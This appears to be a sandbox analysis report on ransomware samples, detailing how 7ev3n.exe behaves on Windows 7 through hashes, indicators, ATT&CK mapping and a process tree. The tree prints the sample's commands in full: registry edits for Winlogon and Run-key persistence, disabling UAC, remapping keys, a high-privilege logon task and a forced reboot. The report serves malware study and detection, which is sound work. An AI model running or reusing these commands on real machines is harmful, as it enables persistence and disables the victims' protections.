Overview
overview
10Static
static
77ev3n.exe
windows7-x64
7ev3n.exe
windows10-2004-x64
Annabelle.exe
windows7-x64
Annabelle.exe
windows10-2004-x64
BadRabbit.exe
windows7-x64
BadRabbit.exe
windows10-2004-x64
Birele.exe
windows10-2004-x64
10Cerber 5.exe
windows7-x64
10Cerber 5.exe
windows10-2004-x64
10Darkside.exe
windows7-x64
10Darkside.exe
windows10-2004-x64
10DeriaLock.exe
windows7-x64
7DeriaLock.exe
windows10-2004-x64
7Analysis
-
max time kernel
27s -
max time network
28s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
15-03-2024 21:34
Behavioral task
behavioral1
Sample
7ev3n.exe
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
7ev3n.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
Annabelle.exe
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
Annabelle.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral5
Sample
BadRabbit.exe
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
BadRabbit.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
Birele.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral8
Sample
Cerber 5.exe
Resource
win7-20240221-en
Behavioral task
behavioral9
Sample
Cerber 5.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral10
Sample
Darkside.exe
Resource
win7-20240221-en
Behavioral task
behavioral11
Sample
Darkside.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral12
Sample
DeriaLock.exe
Resource
win7-20240221-en
Behavioral task
behavioral13
Sample
DeriaLock.exe
Resource
win10v2004-20240226-en
Errors
General
-
Target
7ev3n.exe
-
Size
315KB
-
MD5
9f8bc96c96d43ecb69f883388d228754
-
SHA1
61ed25a706afa2f6684bb4d64f69c5fb29d20953
-
SHA256
7d373ccb96d1dbb1856ef31afa87c2112a0c1795a796ab01cb154700288afec5
-
SHA512
550a891c1059f58aa983138caf65a7ea9c326cb1b94c15f3e7594128f6e9f1295b9c2dbc0925637dba7c94e938083fffc6a63dc7c2e5b1e247679931cce505c6
-
SSDEEP
6144:BswDdb2MemnBVlz0SoVbO4A6OA4Trl28TyT6llY1/I8cWJWlfTXv:BswRSslz0P1OdFXJlJ8buXv
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\system.exe" reg.exe -
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Deletes itself 1 IoCs
Processes:
cmd.exepid process 2596 cmd.exe -
Executes dropped EXE 1 IoCs
Processes:
system.exepid process 1964 system.exe -
Loads dropped DLL 2 IoCs
Processes:
7ev3n.exepid process 2328 7ev3n.exe 2328 7ev3n.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Local\\system.exe" reg.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
shutdown.exedescription pid process Token: SeShutdownPrivilege 680 shutdown.exe Token: SeRemoteShutdownPrivilege 680 shutdown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
7ev3n.exesystem.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 2328 wrote to memory of 1964 2328 7ev3n.exe system.exe PID 2328 wrote to memory of 1964 2328 7ev3n.exe system.exe PID 2328 wrote to memory of 1964 2328 7ev3n.exe system.exe PID 2328 wrote to memory of 1964 2328 7ev3n.exe system.exe PID 1964 wrote to memory of 2596 1964 system.exe cmd.exe PID 1964 wrote to memory of 2596 1964 system.exe cmd.exe PID 1964 wrote to memory of 2596 1964 system.exe cmd.exe PID 1964 wrote to memory of 2596 1964 system.exe cmd.exe PID 1964 wrote to memory of 2712 1964 system.exe SCHTASKS.exe PID 1964 wrote to memory of 2712 1964 system.exe SCHTASKS.exe PID 1964 wrote to memory of 2712 1964 system.exe SCHTASKS.exe PID 1964 wrote to memory of 2712 1964 system.exe SCHTASKS.exe PID 1964 wrote to memory of 2928 1964 system.exe cmd.exe PID 1964 wrote to memory of 2928 1964 system.exe cmd.exe PID 1964 wrote to memory of 2928 1964 system.exe cmd.exe PID 1964 wrote to memory of 2928 1964 system.exe cmd.exe PID 1964 wrote to memory of 2592 1964 system.exe cmd.exe PID 1964 wrote to memory of 2592 1964 system.exe cmd.exe PID 1964 wrote to memory of 2592 1964 system.exe cmd.exe PID 1964 wrote to memory of 2592 1964 system.exe cmd.exe PID 1964 wrote to memory of 2156 1964 system.exe cmd.exe PID 1964 wrote to memory of 2156 1964 system.exe cmd.exe PID 1964 wrote to memory of 2156 1964 system.exe cmd.exe PID 1964 wrote to memory of 2156 1964 system.exe cmd.exe PID 1964 wrote to memory of 2752 1964 system.exe cmd.exe PID 1964 wrote to memory of 2752 1964 system.exe cmd.exe PID 1964 wrote to memory of 2752 1964 system.exe cmd.exe PID 1964 wrote to memory of 2752 1964 system.exe cmd.exe PID 1964 wrote to memory of 2708 1964 system.exe cmd.exe PID 1964 wrote to memory of 2708 1964 system.exe cmd.exe PID 1964 wrote to memory of 2708 1964 system.exe cmd.exe PID 1964 wrote to memory of 2708 1964 system.exe cmd.exe PID 1964 wrote to memory of 2632 1964 system.exe cmd.exe PID 1964 wrote to memory of 2632 1964 system.exe cmd.exe PID 1964 wrote to memory of 2632 1964 system.exe cmd.exe PID 1964 wrote to memory of 2632 1964 system.exe cmd.exe PID 2592 wrote to memory of 2528 2592 cmd.exe reg.exe PID 2592 wrote to memory of 2528 2592 cmd.exe reg.exe PID 2592 wrote to memory of 2528 2592 cmd.exe reg.exe PID 2592 wrote to memory of 2528 2592 cmd.exe reg.exe PID 2928 wrote to memory of 1316 2928 cmd.exe reg.exe PID 2928 wrote to memory of 1316 2928 cmd.exe reg.exe PID 2928 wrote to memory of 1316 2928 cmd.exe reg.exe PID 2928 wrote to memory of 1316 2928 cmd.exe reg.exe PID 2156 wrote to memory of 2072 2156 cmd.exe reg.exe PID 2156 wrote to memory of 2072 2156 cmd.exe reg.exe PID 2156 wrote to memory of 2072 2156 cmd.exe reg.exe PID 2156 wrote to memory of 2072 2156 cmd.exe reg.exe PID 2752 wrote to memory of 2516 2752 cmd.exe reg.exe PID 2752 wrote to memory of 2516 2752 cmd.exe reg.exe PID 2752 wrote to memory of 2516 2752 cmd.exe reg.exe PID 2752 wrote to memory of 2516 2752 cmd.exe reg.exe PID 2632 wrote to memory of 2272 2632 cmd.exe reg.exe PID 2632 wrote to memory of 2272 2632 cmd.exe reg.exe PID 2632 wrote to memory of 2272 2632 cmd.exe reg.exe PID 2632 wrote to memory of 2272 2632 cmd.exe reg.exe PID 2708 wrote to memory of 2060 2708 cmd.exe reg.exe PID 2708 wrote to memory of 2060 2708 cmd.exe reg.exe PID 2708 wrote to memory of 2060 2708 cmd.exe reg.exe PID 2708 wrote to memory of 2060 2708 cmd.exe reg.exe PID 1964 wrote to memory of 1260 1964 system.exe cmd.exe PID 1964 wrote to memory of 1260 1964 system.exe cmd.exe PID 1964 wrote to memory of 1260 1964 system.exe cmd.exe PID 1964 wrote to memory of 1260 1964 system.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\7ev3n.exe"C:\Users\Admin\AppData\Local\Temp\7ev3n.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\system.exe"C:\Users\Admin\AppData\Local\system.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Local\del.bat3⤵
- Deletes itself
-
C:\Windows\SysWOW64\SCHTASKS.exeC:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f3⤵
- Creates scheduled task(s)
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:643⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:644⤵
- Modifies WinLogon for persistence
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:643⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:644⤵
- Adds Run key to start application
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:643⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:644⤵
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:643⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:644⤵
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:643⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:644⤵
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:643⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:644⤵
- UAC bypass
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:644⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c shutdown -r -t 10 -f3⤵
-
C:\Windows\SysWOW64\shutdown.exeshutdown -r -t 10 -f4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x01⤵
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x11⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Abuse Elevation Control Mechanism
1Bypass User Account Control
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\del.batFilesize
65B
MD5f727ee128a7eeb23b9c3242b049e61ef
SHA1a260ee1e7c05377830130163737c7609598d61ee
SHA25698bfdb556f8e8a2564cadfd0c62fff7b81b3a70a4f7e03a86f704fabd5d3c884
SHA512c59a537dbd2349d0f29b6596d35c387fbb76a2cde16fddee04c3d861221c2a7a9ef1af67577a63a80523ec4fc079cc64090e3e86544730bf9cdac2ca122a9c0e
-
\Users\Admin\AppData\Local\system.exeFilesize
315KB
MD5960210c40a73291e4349cb16c26afc66
SHA1e90335ab561ca12801b22e15446c84f90ab53588
SHA256fef8a83f4105221a01de09749072671b2c6c944a5d52c15d0852cc9a4b6c4890
SHA51244a42cc7a5baab876e3a7fce4d9d05839de666577306985d8d5920f38f0150ce335c351eaa4d8f834b43abfcb26eb3aa06fbb467dc56695eacd35ad11d8a259a
-
memory/1860-105-0x0000000002D90000-0x0000000002D91000-memory.dmpFilesize
4KB
-
memory/2112-106-0x0000000002B30000-0x0000000002B31000-memory.dmpFilesize
4KB